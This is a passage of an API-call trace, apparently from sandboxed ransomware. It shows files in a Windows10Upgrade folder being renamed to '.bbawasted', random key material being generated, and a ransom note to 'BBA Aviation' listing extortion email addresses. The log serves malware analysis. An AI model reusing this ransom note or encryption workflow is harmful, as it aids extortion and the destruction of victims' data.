(lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm.bbawasted")) returned 1 [0235.786] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_et-ee.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_et-ee.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0235.786] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0235.786] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xf67d [0235.786] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf67d) returned 0x5f0000 [0235.786] CloseHandle (hObject=0x280) returned 1 [0235.790] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0235.791] CloseHandle (hObject=0x27c) returned 1 [0235.791] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa3d8 [0235.791] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0235.858] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x6aa420 | out: pbBuffer=0x6aa420) returned 1 [0235.858] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0235.861] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6bd0) returned 1 [0235.976] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0235.976] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0235.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0235.988] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa3d8 | out: hHeap=0x660000) returned 1 [0235.988] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.988] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NNLv53ggYWrwStfzo/ybQFlTwy2nKdf89COFr5+/dZfn/Ggq0TZ3cY0oiOxRmlMQ\r\nlkklfW0udXDrWIVe0Dh9gE1qU3mA2Yl+InwQJSSYJ/trDadDU+pPvfJKyyr4gqtp\r\nzWnDwdMLMNAzFpe+FL08ZQR0fANpaMzkPb1x4J9yI0db9PsT2pEehawK88sq2+Sb\r\nWoqcJ4iH8DvxXhWgoglD4RG3ObA7TUzU5tB4Tx2jI4PPxo/EusWHw08mr+3g0Qo/\r\nlYtghQQixetvUy31IMpdpmWma2pXxvFsHVcm1B2+lQjzJJpH/CRiWv8uILhixO4l\r\nHHeOHowBGvZ5WbJgRPAaszAWyEkokCqhuBOkzoKSUU0EBtDn5pHNyIAYos3e2TvK\r\nXH+wRn4a+H/0A5KikIonhEb7WFKarGAd6cAWSbQGzeL+2MOAa4xmitrhDFD+/RhO\r\n7W4nrrJ/TtE9CUNShxbyQHjOoP7udxAw20i+WsufoObkKloUKZjbJOnOvt7gp7wR\r\nK+xperYM5lGTWRrCj/6+/zKwauXQXBS18GhQVkf1MXnDXevGHxZ6NFbOXdEZNZBH\r\nvyFScZ055DN809G3gQ7If0JHr0gUaZu0Oqe8eiOf5eQPVFTI0EJ/Hh0G4Zrl2kjn\r\nmPNnREluG3awT75W/FyTTNkZqVRNIYhbYbI6ANMKObY=[end_key]\r\nKEEP IT\r\n") returned 984 [0235.989] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0235.989] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0235.989] SetEndOfFile (hFile=0x290) returned 1 [0235.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0235.992] CloseHandle (hObject=0x290) returned 1 [0235.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0235.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c2408 | out: hHeap=0x660000) returned 1 [0235.992] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0235.993] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0235.993] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0235.993] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm") returned 56 [0235.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0235.994] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0235.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0235.994] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0235.994] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0235.994] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0235.994] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0235.998] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.000] SetEndOfFile (hFile=0x290) returned 1 [0236.000] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.000] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.000] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm.bbawasted")) returned 1 [0236.001] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0236.001] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0236.001] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10f0a [0236.001] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f0a) returned 0x610000 [0236.002] CloseHandle (hObject=0x280) returned 1 [0236.005] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0236.006] CloseHandle (hObject=0x294) returned 1 [0236.006] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0236.006] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0236.007] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0236.007] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0236.007] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0236.008] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0236.008] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0236.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.107] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0236.107] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.107] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DEIMGncnegNdDFLKFzM7dobGCln1ZgVrSh9vzDbbnMoGUg7+A25eTETEs8sinkoM\r\nmQJdDZd7jVPhF2JATKjKUwopqXAi6KndjJ6aufU51ZDisdVSoXFiCyVgMOMwCfDV\r\nQJwtYa7DGDjhv/OSXK8+wu0i4ARfQJWPxxqcWEYgeiO+2+1cQIuUANDQ77pp1Op6\r\n1w+DTvi8XUChSj/ssClW5s7AMz5bVY6KReLwQpmsRGxpNo3IlD6uRnayFFtXOQaS\r\nOX2QRZ5uKTfPa/nrLchDutfzJGEOsyN/XB4iakt/SlqQY9cQiVmpGb4s/6Dpjay7\r\nzBIoBTbdwL0jH39NT69e67LGSGjxohp6gPMLg5AwrGLiLzErhaiGnjdKf5N268A+\r\nQDK8vHRQQ2rg4UqilY7JdCkfuXv5lH8e9jWSHgdkmbCqH+vGkAj+XOqcRWuJJqGP\r\nKGKt5hNn88Jy2WucvkvL4pBhBSgiVxsK1zuwCZ1ORhEuZRS1MnENRxQDFDQeAwqL\r\n1HNYTmCZReyPH4nd2fBh8L/M4AXweqjZYhBxySmLFIq8GeiQt7nVtnCFAHKzWVCz\r\n1+DLgELKzxlPDfMNv2rzi6nYB6VjUpRlfAxZ0qXJurNXxdrp1k02UsIbHRSo1/gI\r\naysC3urlQ2AAxLJfWapJWpcOcZhU8QKQhRbV+ode0zt=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.108] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0236.108] SetEndOfFile (hFile=0x290) returned 1 [0236.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.110] CloseHandle (hObject=0x290) returned 1 [0236.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0236.110] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1be8 | out: hHeap=0x660000) returned 1 [0236.111] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0236.111] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0236.111] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0236.111] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm") returned 56 [0236.111] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0236.111] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.112] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.112] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0236.112] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.112] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0236.112] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0236.113] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.114] SetEndOfFile (hFile=0x290) returned 1 [0236.114] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.114] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.114] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm.bbawasted")) returned 1 [0236.242] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0236.242] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0236.243] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xfd68 [0236.243] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfd68) returned 0x610000 [0236.243] CloseHandle (hObject=0x27c) returned 1 [0236.247] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0236.248] CloseHandle (hObject=0x294) returned 1 [0236.248] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa5e0 [0236.248] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0236.248] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x6aa628 | out: pbBuffer=0x6aa628) returned 1 [0236.248] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0236.249] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0236.249] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0236.249] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0236.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa5e0 | out: hHeap=0x660000) returned 1 [0236.258] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.258] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]tGI3lJRIXBrG4ec4LMb9yxrzYRiKEJ2RMjjbDkMFmMJz0hX8IRGAEIop5wquBq80\r\nXBn0Bnd86NYSt3pkeMCxeXWF1reftDiZALBl8RwRvMZPqpH9YfTyX8rUt+aFgPvn\r\ngUIk9KOC4sEG4rGrwzjWIRaPOoHbPEcrt9sMtBsNIoUu83EPoekQrqOWDdOANase\r\nSnaLTs/zqTEej7Vbr1Cu2qq+UngKckp2PMMDcc9fQfLzyT71KNQUuvfOFkJVbuaT\r\nSk30RZXxQpzLlcUzmgHeOumu0AJ6F5y+kwOaUXdnrt5uGpabl9xthOMXL1DR6wXG\r\n/qZTh5Mw6fGm1lu9ZxEM1X8Q7fbGPjckJ9FcbjyQIDH+TOIDthGlCi5vNGGMB8Lj\r\n3jT8tfLj2Ljk0FyCe33tWiOMsTmTivBEiIH4bCjW6kMZAynGW7/Hi/I/tvRt+eJR\r\n7WLvTuPazRiZR5cOyk7MvIK/ihiNNV3MNQJJ8FSXYpfVoEMVEP+1Qxn8evVFhs+z\r\n4tlW2+q/km/Q3+6Xh8ICfJyMe0iqH6JHOeC79YxsWaPZjJFvMB2s/KJJ1OEaMbrh\r\na2pXuddor0oN8vTDMR3Ujtbuhw2y7mb/pW6wnKJifkYMBZEFTRqyC0Onzdfosmax\r\nyQE+ikaFS8glELZz4H2Q8JcyflUtviJouvn4nYSyF4y=[end_key]\r\nKEEP IT\r\n") returned 984 [0236.258] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0236.258] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0236.258] SetEndOfFile (hFile=0x290) returned 1 [0236.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.261] CloseHandle (hObject=0x290) returned 1 [0236.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0236.261] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c1cb8 | out: hHeap=0x660000) returned 1 [0236.262] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a5f10) returned 1 [0236.262] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0236.262] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0236.262] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm") returned 56 [0236.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6c4b88 [0236.262] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0236.262] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.263] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6d68) returned 1 [0236.263] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0236.263] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0236.263] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0236.264] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0236.266] SetEndOfFile (hFile=0x290) returned 1 [0236.266] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0236.266] lstrcpyW (in: lpString1=0x6c4bf8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0236.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm.bbawasted")) returned 1 [0236.267] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_it-it.htm.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_it-it.htm.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0236.267] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0236.267] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10f6d [0236.267] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f6d) returned 0x610000 [0236.267] CloseHandle (hObject=0x294) returned 1 [0236.645] UnmapViewOfFile (lpBaseAddress=0x610000) returned 1 [0236.646] CloseHandle (hObject=0x27c) returned 1 [0236.646] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6aa7e8 [0236.646] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0236.647] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x6aa830 | out: pbBuffer=0x6aa830) returned 1 [0236.648] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0236.648] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0236.648] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0236.648] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0236.659] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0236.660] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa7e8 | out: hHeap=0x660000) returned 1 [0236.660] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0236.660] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 